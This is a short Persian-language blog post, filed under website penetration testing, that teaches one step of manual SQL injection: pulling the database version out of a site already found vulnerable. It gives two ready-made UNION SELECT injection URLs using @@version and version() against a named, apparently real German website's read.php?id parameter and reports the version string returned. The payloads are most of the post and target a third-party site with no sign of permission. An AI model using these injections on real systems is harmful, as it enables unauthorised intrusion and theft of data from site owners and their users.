به نام خدا

پس از اینکه فهمیدیم که تارگت مورد نظر ما دارای آسیب پذیری است و تعداد ستون ها و ستون های آسیب پذیر را بیرون کشیدیم نوبت آن است که ورژن دیتابیس

مورد نظر را بیرون بکشیم تا ببینیم که سایت از چه ورژنی برای دیتابیس استفاده می کند برای اینکار به صورت زیر عمل می کنیم :


http://www.ecco-bad-zwischenahn.de/read.php?id=54+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13--+

یا

http://www.ecco-bad-zwischenahn.de/read.php?id=54+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13--+


درهر دو حالت که شما دستور رو تایپ کنید ورژن دیتابیس رو به ما می رهد و به شکل زیر می باشد
5.5.47-log

نوشته شده در تاریخ سه شنبه 20 بهمن 1394    | توسط: No Name    | طبقه بندی: امنیت و تست نفوذ در سایت،     |
نظرات()